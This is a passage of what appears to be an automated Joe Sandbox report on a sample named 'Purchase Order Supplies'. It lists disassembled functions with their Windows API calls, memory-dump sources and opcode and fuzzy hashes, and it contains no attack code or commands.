                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                          • String ID:
                          • API String ID: 1552873950-0
                          • Opcode ID: 3bbf84d6b84c5ccb4406d7a14d13c4f849fbec825050499589f31b9b6ee91132
                          • Instruction ID: 3eedb2847dbf168ca14fd835c64738040e72a324b2f9df21195c2b69cbf00885
                          • Opcode Fuzzy Hash: 3bbf84d6b84c5ccb4406d7a14d13c4f849fbec825050499589f31b9b6ee91132
                          • Instruction Fuzzy Hash: 17512DB1D04219AFDF159F64CC81AAEBBB9FF48300F1040AEF619A3291D7715A80DF59
                          Function 00C91E58 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 00C91E87
                            • Part of subcall function 00C938E4: _memset.LIBCMT ref: 00C93965
                            • Part of subcall function 00C938E4: _wcscpy.LIBCMT ref: 00C939B5
                            • Part of subcall function 00C938E4: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00C939C6
                          • KillTimer.USER32(?,00000001), ref: 00C91EDC
                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00C91EEB
                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00D04526
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                          • String ID:
                          • API String ID: 1378193009-0
                          • Opcode ID: fe941ea6d52b53551b5e8848736f35b779def869a53f429d5f1278c159ab3504
                          • Instruction ID: cdd991913f6fc02c0386dc497f4ed69f22735e03fd2ba22d05116ae1e4c16521
                          • Opcode Fuzzy Hash: fe941ea6d52b53551b5e8848736f35b779def869a53f429d5f1278c159ab3504
                          • Instruction Fuzzy Hash: CF2168B5504794AFEB3297248C5DFEBBBEC9B05308F08408DEA9E97281C7745A85C761
                          Function 00CE92C0 Relevance: 6.1, APIs: 4, Instructions: 60networkCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CAF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00CDAEA5,?,?,00000000,00000008), ref: 00CAF282
                            • Part of subcall function 00CAF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00CDAEA5,?,?,00000000,00000008), ref: 00CAF2A6
                          • gethostbyname.WS2_32(?), ref: 00CE92F0
                          • WSAGetLastError.WS2_32(00000000), ref: 00CE92FB
                          • _memmove.LIBCMT ref: 00CE9328
                          • inet_ntoa.WS2_32(?), ref: 00CE9333
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                          • String ID:
                          • API String ID: 1504782959-0
                          • Opcode ID: e6b4f807865d11c95476775d84d7e2f1cd830bc506f58804838d20c47b1240a7
                          • Instruction ID: e4eb9aa4abb53eafb3c8c29020fd42495f7f2c1e0fa5a1f0f944de1406ff0f86
                          • Opcode Fuzzy Hash: e6b4f807865d11c95476775d84d7e2f1cd830bc506f58804838d20c47b1240a7
                          • Instruction Fuzzy Hash: 5D115E76600109AFCF04FBA1CD5ADEE77B9EF183147104055F506A72A2DF30AE05EB61
                          Function 00CB010A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CB45EC: __FF_MSGBANNER.LIBCMT ref: 00CB4603
                            • Part of subcall function 00CB45EC: __NMSG_WRITE.LIBCMT ref: 00CB460A
                            • Part of subcall function 00CB45EC: RtlAllocateHeap.NTDLL(01350000,00000000,00000001), ref: 00CB462F
                          • std::exception::exception.LIBCMT ref: 00CB013E
                          • __CxxThrowException@8.LIBCMT ref: 00CB0153
                            • Part of subcall function 00CB7495: RaiseException.KERNEL32(?,?,00C9125D,00D46598,?,?,?,00CB0158,00C9125D,00D46598,?,00000001), ref: 00CB74E6
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                          • String ID: bad allocation
                          • API String ID: 3902256705-2104205924
                          • Opcode ID: aa488b650742c613b2836f7d915e238149ea543c39c282c80c882aefd7cd6ed5
                          • Instruction ID: 45cfbf1f4b8c157566b0940df674cdeed598a7d351b292972dd4d9e01449b0c2
                          • Opcode Fuzzy Hash: aa488b650742c613b2836f7d915e238149ea543c39c282c80c882aefd7cd6ed5
                          • Instruction Fuzzy Hash: C3F0AF7514821EA6CB19EFACE8029EE7BE9AF04351F200416F90592192DFB0CA84A6B5
                          Function 00CEF79F Relevance: 4.9, APIs: 3, Instructions: 385COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b940fcda3d4edce92dc13c09b5d79d3e434c864496a52dd6012cbec23fd7e046
                          • Instruction ID: b7879bbf81139926142126198710596bf1e589e0f7d244685eabea15c9c0685d
                          • Opcode Fuzzy Hash: b940fcda3d4edce92dc13c09b5d79d3e434c864496a52dd6012cbec23fd7e046
                          • Instruction Fuzzy Hash: D7F18B71A047459FC710DF29C884B5AB7E5FF88314F14892EF9999B392D730E946CB82
                          Function 00D08071 Relevance: 4.8, APIs: 3, Instructions: 266COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: ClearVariant_memmove
                          • String ID:
                          • API String ID: 19560607-0
                          • Opcode ID: ed85c1ac0c7799b2d633880b14923fa4c90003c65ad7d0c7b732d2d2a13f2877
                          • Instruction ID: 13a7e6d78b451a0ed299fd39e1715a82ff292d264e8eda5348683791055eceb5
                          • Opcode Fuzzy Hash: ed85c1ac0c7799b2d633880b14923fa4c90003c65ad7d0c7b732d2d2a13f2877
                          • Instruction Fuzzy Hash: 55A19F749002579FCB24CF58C890AADF7B1FF06318F688529E8699B351D735EE86CB90
                          Function 00C9C610 Relevance: 4.6, APIs: 3, Instructions: 125COMMON
                          Download Yara Rule
                          APIs
                          • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,00C9C00E,?,?,?,?,00000010), ref: 00C9C627
                          • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,00000010), ref: 00C9C65F
                          • _memmove.LIBCMT ref: 00C9C697
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide$_memmove
                          • String ID:
                          • API String ID: 3033907384-0
                          • Opcode ID: af089a809aa2bd5da9e6225db6e4e7b688bbb157d7efc6d61a3d4d1e41b6bb9f
                          • Instruction ID: 84b28c93a1b84beb828540cae95368861c411b0e89f7f9fbbcd72369707bd55b
                          • Opcode Fuzzy Hash: af089a809aa2bd5da9e6225db6e4e7b688bbb157d7efc6d61a3d4d1e41b6bb9f
                          • Instruction Fuzzy Hash: 303107B26012017BDB289B78DC8AB6BB7D9EF54350F10453EF85ACB290EB32E9509751
                          Function 00C93A67 Relevance: 4.6, APIs: 3, Instructions: 78COMMON
                          Download Yara Rule
                          APIs
                          • SHGetMalloc.SHELL32(00C93C31), ref: 00C93A7D
                          • SHGetPathFromIDListW.SHELL32(?,?), ref: 00C93AD2
                          • SHGetDesktopFolder.SHELL32(?), ref: 00C93A8F
                            • Part of subcall function 00C93B1E: _wcsncpy.LIBCMT ref: 00C93B32
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: DesktopFolderFromListMallocPath_wcsncpy
                          • String ID:
                          • API String ID: 3981382179-0
                          • Opcode ID: 18a9b2c82e434ccd79d5c8b415627808169a832203d15424d2419dfcac1fdd9f
                          • Instruction ID: b21d04df7f656e7847626f48892cae91f5cdaa8ced83e48538d0f99c2d5d9fb4
                          • Opcode Fuzzy Hash: 18a9b2c82e434ccd79d5c8b415627808169a832203d15424d2419dfcac1fdd9f
                          • Instruction Fuzzy Hash: C5213C76B00114ABCB14DF95DC88EEEB7BEEF88700B144094F509D7251DB309E469BA4
                          Function 00CB45EC Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • __FF_MSGBANNER.LIBCMT ref: 00CB4603
                            • Part of subcall function 00CB8E52: __NMSG_WRITE.LIBCMT ref: 00CB8E79
                            • Part of subcall function 00CB8E52: __NMSG_WRITE.LIBCMT ref: 00CB8E83
                          • __NMSG_WRITE.LIBCMT ref: 00CB460A
                            • Part of subcall function 00CB8EB2: GetModuleFileNameW.KERNEL32(00000000,00D50312,00000104,?,00000001,00CB0127), ref: 00CB8F44
                            • Part of subcall function 00CB8EB2: ___crtMessageBoxW.LIBCMT ref: 00CB8FF2
                            • Part of subcall function 00CB1D65: ___crtCorExitProcess.LIBCMT ref: 00CB1D6B
                            • Part of subcall function 00CB1D65: ExitProcess.KERNEL32 ref: 00CB1D74
                            • Part of subcall function 00CB889E: __getptd_noexit.LIBCMT ref: 00CB889E
                          • RtlAllocateHeap.NTDLL(01350000,00000000,00000001), ref: 00CB462F
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                          • String ID:
                          • API String ID: 1372826849-0
                          • Opcode ID: 12223b911a51d9824c73cf3a3444b396c8a4f5301b11cd38e6f1aec3ff427b21
                          • Instruction ID: a2be1d5072607df15d6c1574398335af9bc1ba937c573d64bd50b8a700872081
                          • Opcode Fuzzy Hash: 12223b911a51d9824c73cf3a3444b396c8a4f5301b11cd38e6f1aec3ff427b21
                          • Instruction Fuzzy Hash: 4F01B935605301AAE6293B35AC41AEA374CAF82761F150126F915D72C7DFB0DC40DA64
                          Function 00C9E60E Relevance: 4.5, APIs: 3, Instructions: 31windowCOMMON
                          Download Yara Rule
                          APIs
                          • TranslateMessage.USER32(?), ref: 00C9E646
                          • DispatchMessageW.USER32(?), ref: 00C9E651
                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C9E664
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Message$DispatchPeekTranslate
                          • String ID:
                          • API String ID: 4217535847-0
                          • Opcode ID: 03a5688a20e76dcca1c21ceb49f6696f86dbaf986f337a800437ca84699f4820
                          • Instruction ID: 60b3bef7f7bf034b848873ce27fbd2067698484586095b345f284ec8b2fd1a1a
                          • Opcode Fuzzy Hash: 03a5688a20e76dcca1c21ceb49f6696f86dbaf986f337a800437ca84699f4820
                          • Instruction Fuzzy Hash: 48F01271644349A7DF20E7E18C49BABB7DDBB94744F144C2DFA45C2190DBB4D505CB22
                          Function 00CDC450 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                          Download Yara Rule
                          APIs
                          • _free.LIBCMT ref: 00CDC45E
                            • Part of subcall function 00CB28CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00CB8715,00000000,00CB88A3,00CB4673,?), ref: 00CB28DE
                            • Part of subcall function 00CB28CA: GetLastError.KERNEL32(00000000,?,00CB8715,00000000,00CB88A3,00CB4673,?), ref: 00CB28F0
                          • _free.LIBCMT ref: 00CDC46F
                          • _free.LIBCMT ref: 00CDC481
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: 087bea45b9e552155f1be1c866ba964bb642fabb90d708dc02c9b9c981af8e32
                          • Instruction ID: d3edc811f614397a1b6d368569de55e160b2cac66a4a10b03423970e6f4eac9f
                          • Opcode Fuzzy Hash: 087bea45b9e552155f1be1c866ba964bb642fabb90d708dc02c9b9c981af8e32
                          • Instruction Fuzzy Hash: 5AE017A260070296CA24AA79A894BF363CC6F04761F14482EF669D72C2DF28E940E578
                          Function 00CA058E Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 527COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID:
                          • String ID: CALL
                          • API String ID: 0-4196123274
                          • Opcode ID: 5fc05d5ce43a6cf3809cffccd1cd29066680f0361f324cb6041926bfacc6e7f0
                          • Instruction ID: b8dd3ed940da09c652158f84993586f6632dfc7cbadd9c00bd3948c7033023e8
                          • Opcode Fuzzy Hash: 5fc05d5ce43a6cf3809cffccd1cd29066680f0361f324cb6041926bfacc6e7f0
                          • Instruction Fuzzy Hash: B3227B70508342CFDB28DF24C494B2AB7E1BF86348F25895DE99A8B3A1D731ED45DB42
                          Function 00C9131C Relevance: 3.9, APIs: 3, Instructions: 159COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00C916F2: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 00C91751
                          • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00C9159B
                          • CoInitialize.OLE32(00000000), ref: 00C91612
                          • CloseHandle.KERNEL32(00000000), ref: 00D058F7
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Handle$ClipboardCloseFormatInitializeRegister
                          • String ID:
                          • API String ID: 458326420-0
                          • Opcode ID: 48ff6694a5fab59a84cc4df706d125cc92c79cd6953dd3a78475b7cffda20872
                          • Instruction ID: 3a91bf2ee38c25afdbdc412c642134c30ad9592af422f736ce344289779b38df
                          • Opcode Fuzzy Hash: 48ff6694a5fab59a84cc4df706d125cc92c79cd6953dd3a78475b7cffda20872
                          • Instruction Fuzzy Hash: 2A71C9BC9013559BCB00DF6AA8957A4BBE4FB5834B794662EDC0AC7362DB704848CF31
                          Function 00C94010 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: _memmove
                          • String ID: EA06
                          • API String ID: 4104443479-3962188686
                          • Opcode ID: a4b290def2bc9a5890ce3210d5d41e9ffced073b20d6024d046296959978632c
                          • Instruction ID: d6f9187e65d56a1a7d7776005899a8356dcb56e3a31af3cf91e2a524dbf371b4
                          • Opcode Fuzzy Hash: a4b290def2bc9a5890ce3210d5d41e9ffced073b20d6024d046296959978632c
                          • Instruction Fuzzy Hash: 5641B031A041549BCF1D9B648CA9FBF7FA2DF55300F285565EA82DB283C6218EC397B1
                          Function 00CE013F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: _wcscmp
                          • String ID: 0.0.0.0
                          • API String ID: 856254489-3771769585
                          • Opcode ID: 16cecdf44ad5a0484cd72576488df7cd6eee70d0f781c1b03694b04c3daab23c
                          • Instruction ID: a177577587999f61bf5a32958073cb3e447f03f2d555b9e76230272b0bdca82f
                          • Opcode Fuzzy Hash: 16cecdf44ad5a0484cd72576488df7cd6eee70d0f781c1b03694b04c3daab23c
                          • Instruction Fuzzy Hash: A9112335700204DFCB04EB15D9D1E5DB3A9AF98710B208089F605AF391DAB0ED82EBA0
                          Function 00C93BFF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54COMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 00D03CF1
                            • Part of subcall function 00C931B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00C931DA
                            • Part of subcall function 00C93A67: SHGetMalloc.SHELL32(00C93C31), ref: 00C93A7D
                            • Part of subcall function 00C93A67: SHGetDesktopFolder.SHELL32(?), ref: 00C93A8F
                            • Part of subcall function 00C93A67: SHGetPathFromIDListW.SHELL32(?,?), ref: 00C93AD2
                            • Part of subcall function 00C93B45: GetFullPathNameW.KERNEL32(?,00000104,?,?,00D522E8,?), ref: 00C93B65
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
